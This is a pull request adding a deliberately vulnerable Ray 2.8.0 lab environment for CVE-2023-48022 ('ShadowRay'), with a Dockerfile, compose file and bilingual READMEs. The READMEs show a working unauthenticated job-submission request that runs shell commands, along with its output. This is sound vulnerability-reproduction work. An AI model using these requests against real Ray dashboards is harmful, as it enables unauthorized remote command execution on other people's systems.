### PR TITLE
Add Ray CVE-2023-48022 environment

### DIFF
--- a/base/ray/2.8.0/Dockerfile
+++ b/base/ray/2.8.0/Dockerfile
@@ -1,0 +1,5 @@
+FROM rayproject/ray:2.8.0
+
+LABEL maintainer="phithon <root@leavesongs.com>"
+
+CMD ["ray", "start", "--head", "--dashboard-host=0.0.0.0", "--block"]

--- a/environments.toml
+++ b/environments.toml
@@ -1872,6 +1872,14 @@ dockerfile = {"vulhub/rails:5.2.2" = "base/rails/5.2.2"}
 tags = ["Path Traversal", "Framework"]
 
 [[environment]]
+name = "Ray Job Submission API Unauthenticated Remote Code Execution"
+cve = ["CVE-2023-48022"]
+app = "Ray"
+path = "ray/CVE-2023-48022"
+dockerfile = {"vulhub/ray:2.8.0" = "base/ray/2.8.0"}
+tags = ["RCE"]
+
+[[environment]]
 name = "React Server Components Flight Protocol Deserialization RCE"
 cve = ["CVE-2025-55182"]
 app = "React"

--- a/ray/CVE-2023-48022/README.md
+++ b/ray/CVE-2023-48022/README.md
@@ -1,0 +1,54 @@
+# Ray Job Submission API Unauthenticated Remote Code Execution (CVE-2023-48022)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+[Ray](https://github.com/ray-project/ray) is an open-source unified framework for scaling AI and Python applications, developed by Anyscale. Ray's dashboard exposes a Job Submission REST API on port 8265 that lets clients submit a job by specifying an `entrypoint`, which the Ray head node executes as a shell command. This API implements no authentication or authorization of any kind, so anyone who can reach the dashboard port can submit a job whose `entrypoint` is an arbitrary OS command, achieving unauthenticated remote code execution on the Ray head node. This flaw was assigned CVE-2023-48022 and became widely known as "ShadowRay" after Oligo Security reported active in-the-wild exploitation of internet-exposed Ray dashboards in March 2024.
+
+Anyscale has stated that the lack of authentication on the dashboard/Job API is intended behavior rather than a bug — Ray's threat model assumes the cluster is only ever reachable from a trusted network, and operators are expected to firewall the dashboard themselves. Because of this there is no official patch, and NVD lists the CVE status as "Disputed". Ray 2.6.3 and 2.8.0 are the versions explicitly named in the original security advisory, but the issue affects essentially every Ray release prior to the optional token-based authentication introduced in Ray 2.52.0, since it is a missing-auth-by-design issue rather than a single code regression.
+
+References:
+
+- <https://bishopfox.com/blog/ray-versions-2-6-3-2-8-0>
+- <https://github.com/advisories/GHSA-6wgj-66m2-xxp2>
+- <https://nvd.nist.gov/vuln/detail/CVE-2023-48022>
+- <https://www.oligo.security/blog/shadowray-attack-ai-workloads-actively-exploited-in-the-wild>
+- <https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023>
+
+## Environment Setup
+
+Execute the following command to start Ray 2.8.0:
+
+```
+docker compose up -d
+```
+
+The container runs `ray start --head --dashboard-host=0.0.0.0 --block`, which binds the dashboard and Job Submission API to `http://your-ip:8265`. Binding the dashboard to `0.0.0.0` instead of the safe default `127.0.0.1` is exactly the misconfiguration that exposed real-world Ray clusters to the ShadowRay campaign.
+
+## Vulnerability Reproduction
+
+First, submit a job whose `entrypoint` is an arbitrary shell command to the unauthenticated Job Submission API:
+
+```
+POST /api/jobs/ HTTP/1.1
+Host: your-ip:8265
+Content-Type: application/json
+
+{"entrypoint": "id; whoami; hostname; uname -a", "runtime_env": {}, "metadata": {}}
+```
+
+The response contains a `submission_id`, for example `{"job_id": "raysubmit_V6kjyt1G9kL5mJrT", "submission_id": "raysubmit_V6kjyt1G9kL5mJrT"}`. Then query the job's logs with that ID to retrieve the command output:
+
+```
+GET /api/jobs/raysubmit_V6kjyt1G9kL5mJrT/logs HTTP/1.1
+Host: your-ip:8265
+```
+
+The response shows the command executed on the Ray head node, confirming remote code execution:
+
+```json
+{"logs": "uid=1000(ray) gid=100(users) groups=100(users),27(sudo)\nray\ndd35cf48d566\nLinux dd35cf48d566 6.8.0-117-generic ... x86_64 GNU/Linux\n"}
+```
+
+Here `hostname` and `uname -a` return the Ray container's own hostname and kernel information, proving the command ran on the target rather than locally.
+
+![command output returned by the unauthenticated Job Submission API](1.png)

--- a/ray/CVE-2023-48022/README.zh-cn.md
+++ b/ray/CVE-2023-48022/README.zh-cn.md
@@ -1,0 +1,52 @@
+# Ray Job Submission API 未授权远程代码执行漏洞（CVE-2023-48022）
+
+[Ray](https://github.com/ray-project/ray) 是 Anyscale 开发的开源统一框架，用于扩展 AI 和 Python 应用程序。Ray 的 dashboard 在 8265 端口暴露了一个 Job Submission REST API，客户端可以通过指定 `entrypoint` 字段来提交一个"任务"，Ray head 节点会将该字段作为 shell 命令直接执行。这个 API 没有任何形式的身份验证或授权机制，因此任何能够访问 dashboard 端口的人都可以提交一个 `entrypoint` 为任意操作系统命令的任务，从而在 Ray head 节点上实现未授权远程代码执行。该漏洞被分配编号 CVE-2023-48022，在 2024 年 3 月 Oligo Security 披露针对暴露在公网的 Ray dashboard 的大规模在野利用活动后，被广泛称为 ShadowRay。
+
+Anyscale 官方表示，dashboard/Job API 缺少身份验证是预期行为而非漏洞——Ray 的威胁模型假设集群只会在受信任的网络中被访问，运维人员应当自行通过防火墙隔离 dashboard。因此该漏洞没有官方补丁，NVD 将该 CVE 状态标记为 Disputed（存在争议）。原始安全公告中明确点名受影响的版本为 Ray 2.6.3 和 2.8.0，但由于这是设计层面缺失鉴权导致的问题，几乎所有早于 Ray 2.52.0（引入可选 token 鉴权）的版本都会受到影响。
+
+参考链接：
+
+- <https://bishopfox.com/blog/ray-versions-2-6-3-2-8-0>
+- <https://github.com/advisories/GHSA-6wgj-66m2-xxp2>
+- <https://nvd.nist.gov/vuln/detail/CVE-2023-48022>
+- <https://www.oligo.security/blog/shadowray-attack-ai-workloads-actively-exploited-in-the-wild>
+- <https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023>
+
+## 环境搭建
+
+执行如下命令启动 Ray 2.8.0：
+
+```
+docker compose up -d
+```
+
+容器启动后会执行 `ray start --head --dashboard-host=0.0.0.0 --block`，将 dashboard 及 Job Submission API 绑定到 `http://your-ip:8265`。将 dashboard 绑定到 `0.0.0.0` 而非默认安全的 `127.0.0.1`，正是现实世界中被 ShadowRay 攻击活动利用的那类误配置。
+
+## 漏洞复现
+
+首先，向未授权的 Job Submission API 提交一个 `entrypoint` 为任意 shell 命令的任务：
+
+```
+POST /api/jobs/ HTTP/1.1
+Host: your-ip:8265
+Content-Type: application/json
+
+{"entrypoint": "id; whoami; hostname; uname -a", "runtime_env": {}, "metadata": {}}
+```
+
+响应中会包含一个 `submission_id`，例如 `{"job_id": "raysubmit_V6kjyt1G9kL5mJrT", "submission_id": "raysubmit_V6kjyt1G9kL5mJrT"}`。然后使用该 ID 查询任务日志，即可获取命令执行结果：
+
+```
+GET /api/jobs/raysubmit_V6kjyt1G9kL5mJrT/logs HTTP/1.1
+Host: your-ip:8265
+```
+
+响应中会展示在 Ray head 节点上执行命令的真实结果，从而证明远程代码执行成功：
+
+```json
+{"logs": "uid=1000(ray) gid=100(users) groups=100(users),27(sudo)\nray\ndd35cf48d566\nLinux dd35cf48d566 6.8.0-117-generic ... x86_64 GNU/Linux\n"}
+```
+
+其中 `hostname` 与 `uname -a` 返回的正是 Ray 容器自身的主机名和内核信息，证明命令确实是在目标容器内执行的，而不是在本地执行的。
+
+![未授权 Job Submission API 返回的命令执行结果](1.png)

--- a/ray/CVE-2023-48022/docker-compose.yml
+++ b/ray/CVE-2023-48022/docker-compose.yml
@@ -1,0 +1,6 @@
+services:
+  web:
+    image: vulhub/ray:2.8.0
+    shm_size: "1gb"
+    ports:
+      - "8265:8265"


### PR DESCRIPTION
## Summary

Adds a reproduction environment for CVE-2023-48022 ("ShadowRay"), an unauthenticated remote code execution vulnerability in Ray's Job Submission API. The API's `entrypoint` field is executed directly as a shell command on the Ray head node with no authentication or authorization check, so anyone who can reach the dashboard port (8265) can run arbitrary OS commands.

- `base/ray/2.8.0/Dockerfile`: thin wrapper on the official `rayproject/ray:2.8.0` image that starts the head node with `--dashboard-host=0.0.0.0` (the misconfiguration that exposed real-world clusters), published as `vulhub/ray:2.8.0`
- `ray/CVE-2023-48022/docker-compose.yml`, `README.md`, `README.zh-cn.md`

Ray 2.6.3 and 2.8.0 are the versions named in the original Bishop Fox advisory. Anyscale disputes the CVE and has not shipped a fix (NVD status: Disputed), since the dashboard's lack of authentication is considered intended behavior under Ray's network-isolation threat model.

## Test plan

- [x] `docker build -t vulhub/ray:2.8.0 base/ray/2.8.0` builds successfully
- [x] `docker compose up -d` starts the head node and the dashboard/Job API become reachable on `:8265`
- [x] Submitted `entrypoint: "id; whoami; hostname; uname -a"` via `POST /api/jobs/`, polled to `SUCCEEDED`, and retrieved the command output via `GET /api/jobs/{id}/logs`
- [x] Cross-checked the `hostname` in the command output against `docker inspect`'s real container ID to confirm the command executed inside the target container
- [x] `docker compose down` cleans up

🤖 Generated with [Claude Code](https://claude.com/claude-code)